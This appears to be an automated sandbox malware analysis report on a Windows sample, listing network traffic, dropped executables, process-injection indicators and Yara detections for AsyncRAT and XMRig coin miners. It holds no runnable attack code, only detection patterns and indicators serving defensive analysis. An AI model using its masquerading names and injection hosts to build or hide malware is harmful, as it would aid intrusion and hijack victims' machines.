Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 50169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50157 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900

Source: unknown	HTTPS traffic detected: 172.67.143.156:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.156:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50043 version: TLS 1.2

Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe

Window created: window name: CLIPBRDWNDCLASS

Source: xzzrvckwuia.exe, 00000029.00000002.2145857389.0000000003421000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_d0c6e932-8

Spam, unwanted Advertisements and Ransom Demands

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe

Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 17.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.e00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 26.2.aspnet_compiler.exe.20d578bc530.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 26.2.aspnet_compiler.exe.20d578bc530.1.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 26.2.aspnet_compiler.exe.20d578bc530.1.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 46.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 46.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 46.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000002E.00000002.4108997136.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000011.00000002.2211716586.0000000013011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000011.00000000.1807181029.0000000000E02000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: aspnet_compiler.exe PID: 4628, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: AddInProcess.exe PID: 416, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\Windows.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Code function: 12_2_00007FFD9BC143F9 NtUnmapViewOfSection,		12_2_00007FFD9BC143F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041E747 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,		15_2_0041E747

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Code function: 0_2_00007FFD9B879FEB	0_2_00007FFD9B879FEB
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Code function: 0_2_00007FFD9B87B1E8	0_2_00007FFD9B87B1E8
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Code function: 0_2_00007FFD9B87597A	0_2_00007FFD9B87597A
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Code function: 0_2_00007FFD9B878BAE	0_2_00007FFD9B878BAE
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Code function: 0_2_00007FFD9B8732D8	0_2_00007FFD9B8732D8
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Code function: 0_2_00007FFD9B877088	0_2_00007FFD9B877088
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Code function: 3_2_00007FFD9BAB61EF	3_2_00007FFD9BAB61EF
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Code function: 3_2_00007FFD9BAB6459	3_2_00007FFD9BAB6459
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Code function: 3_2_00007FFD9BC38C65	3_2_00007FFD9BC38C65
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001E8C8F	4_2_001E8C8F
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001D6620	4_2_001D6620
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001EA88C	4_2_001EA88C
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001D5880	4_2_001D5880
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001D98E0	4_2_001D98E0
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001EB9AC	4_2_001EB9AC
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001DCAF0	4_2_001DCAF0
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001F0B00	4_2_001F0B00
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001F641B	4_2_001F641B
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001FF42E	4_2_001FF42E
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001E4C60	4_2_001E4C60
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001F7CC0	4_2_001F7CC0
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_0020A611	4_2_0020A611
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001EAE2C	4_2_001EAE2C
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_00201E79	4_2_00201E79
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001EC660	4_2_001EC660
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_0020A731	4_2_0020A731
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001D4780	4_2_001D4780
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008D8C8F	7_2_008D8C8F
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008C6620	7_2_008C6620
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008DA88C	7_2_008DA88C
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008C5880	7_2_008C5880
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008C98E0	7_2_008C98E0
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008DB9AC	7_2_008DB9AC
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008CCAF0	7_2_008CCAF0
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008E0B00	7_2_008E0B00
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008E7CC0	7_2_008E7CC0
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008E641B	7_2_008E641B
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008EF42E	7_2_008EF42E
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008D4C60	7_2_008D4C60
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008FA611	7_2_008FA611
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008DC660	7_2_008DC660
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008F1E79	7_2_008F1E79
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008C4780	7_2_008C4780
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008FA731	7_2_008FA731
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9BB830E9	11_2_00007FFD9BB830E9
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Code function: 12_2_00007FFD9BA961EF	12_2_00007FFD9BA961EF
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Code function: 12_2_00007FFD9BA96459	12_2_00007FFD9BA96459
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 14_2_00007FFD9BAA9FEB	14_2_00007FFD9BAA9FEB
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 14_2_00007FFD9BAA4FE4	14_2_00007FFD9BAA4FE4
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 14_2_00007FFD9BAA597F	14_2_00007FFD9BAA597F
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 14_2_00007FFD9BAA8BAE	14_2_00007FFD9BAA8BAE
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 14_2_00007FFD9BAA146D	14_2_00007FFD9BAA146D
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 14_2_00007FFD9BAA32D8	14_2_00007FFD9BAA32D8
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 14_2_00007FFD9BAABE30	14_2_00007FFD9BAABE30
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 14_2_00007FFD9BAA5FB3	14_2_00007FFD9BAA5FB3
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 14_2_00007FFD9BAA7088	14_2_00007FFD9BAA7088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040A150	15_2_0040A150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004231B2	15_2_004231B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004492DB	15_2_004492DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004493FB	15_2_004493FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0044A3A0	15_2_0044A3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00444850	15_2_00444850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004229C3	15_2_004229C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004259A1	15_2_004259A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00439A03	15_2_00439A03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00404AF0	15_2_00404AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00448B89	15_2_00448B89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00404C70	15_2_00404C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00444CE8	15_2_00444CE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00427D42	15_2_00427D42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00404E70	15_2_00404E70
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Code function: 17_2_00007FFD9BACDF6A	17_2_00007FFD9BACDF6A
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Code function: 17_2_00007FFD9BAC6F42	17_2_00007FFD9BAC6F42
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Code function: 17_2_00007FFD9BAC1729	17_2_00007FFD9BAC1729
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Code function: 17_2_00007FFD9BAC6196	17_2_00007FFD9BAC6196
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Code function: 17_2_00007FFD9BAC2461	17_2_00007FFD9BAC2461
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Code function: 17_2_00007FFD9BAC21C1	17_2_00007FFD9BAC21C1
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Code function: 23_2_00007FFD9BAD0D16	23_2_00007FFD9BAD0D16
Source: C:\Users\user\Windows.exe	Code function: 29_2_00007FFD9BAB1729	29_2_00007FFD9BAB1729
Source: C:\Users\user\Windows.exe	Code function: 29_2_00007FFD9BAB21C1	29_2_00007FFD9BAB21C1
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Code function: 30_2_00007FFD9BA91729	30_2_00007FFD9BA91729
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Code function: 30_2_00007FFD9BA921C1	30_2_00007FFD9BA921C1
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Code function: 31_2_00007FFD9BAB1729	31_2_00007FFD9BAB1729
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Code function: 31_2_00007FFD9BAB21C1	31_2_00007FFD9BAB21C1
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Code function: 37_2_00007FFD9BAC0D16	37_2_00007FFD9BAC0D16
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Code function: 38_2_00007FFD9BA90D16	38_2_00007FFD9BA90D16
Source: C:\Users\user\Windows.exe	Code function: 39_2_00007FFD9BAC1729	39_2_00007FFD9BAC1729
Source: C:\Users\user\Windows.exe	Code function: 39_2_00007FFD9BAC21C1	39_2_00007FFD9BAC21C1
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	Code function: 40_2_00007FFD9BAB1518	40_2_00007FFD9BAB1518
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	Code function: 40_2_00007FFD9BAB0D16	40_2_00007FFD9BAB0D16
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 44_2_00007FFD9BAC9FEB	44_2_00007FFD9BAC9FEB
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 44_2_00007FFD9BAC4FE4	44_2_00007FFD9BAC4FE4
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 44_2_00007FFD9BAC597F	44_2_00007FFD9BAC597F
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 44_2_00007FFD9BAC8BC0	44_2_00007FFD9BAC8BC0
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 44_2_00007FFD9BAC146D	44_2_00007FFD9BAC146D
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 44_2_00007FFD9BAC32D8	44_2_00007FFD9BAC32D8
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 44_2_00007FFD9BACBE30	44_2_00007FFD9BACBE30
Source: C:\Users\user\Pictures\Illumination.pif	Code function: 44_2_00007FFD9BAC5FB3	44_2_00007FFD9BAC5FB3

Source: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: String function: 008E07C0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: String function: 001F07C0 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041F4F2 appears 67 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00419C70 appears 128 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041FB30 appears 39 times

Source: 52i[1].exe.2.dr	Static PE information: No import functions for PE file found
Source: 52i.exe.2.dr	Static PE information: No import functions for PE file found

Source: trSK2fqPeB.exe, 00000000.00000002.1645950276.0000000012B01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameProlongedPortable.dll4 vs trSK2fqPeB.exe
Source: trSK2fqPeB.exe, 00000000.00000000.1631050078.000000000076A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSimple Calculator.exe6 vs trSK2fqPeB.exe
Source: trSK2fqPeB.exe, 00000000.00000002.1661205854.000000001D330000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameProlongedPortable.dll4 vs trSK2fqPeB.exe
Source: trSK2fqPeB.exe, 00000000.00000000.1631001579.00000000006E2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameProlongedPortable.dll4 vs trSK2fqPeB.exe
Source: trSK2fqPeB.exe	Binary or memory string: OriginalFilenameProlongedPortable.dll4 vs trSK2fqPeB.exe
Source: trSK2fqPeB.exe	Binary or memory string: OriginalFilenameSimple Calculator.exe6 vs trSK2fqPeB.exe

Source: dump.pcap, type: PCAP	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 17.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.e00000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 26.2.aspnet_compiler.exe.20d578bc530.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 26.2.aspnet_compiler.exe.20d578bc530.1.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 26.2.aspnet_compiler.exe.20d578bc530.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 46.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 46.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 46.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000002E.00000002.4108997136.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000011.00000002.2211716586.0000000013011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000011.00000000.1807181029.0000000000E02000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
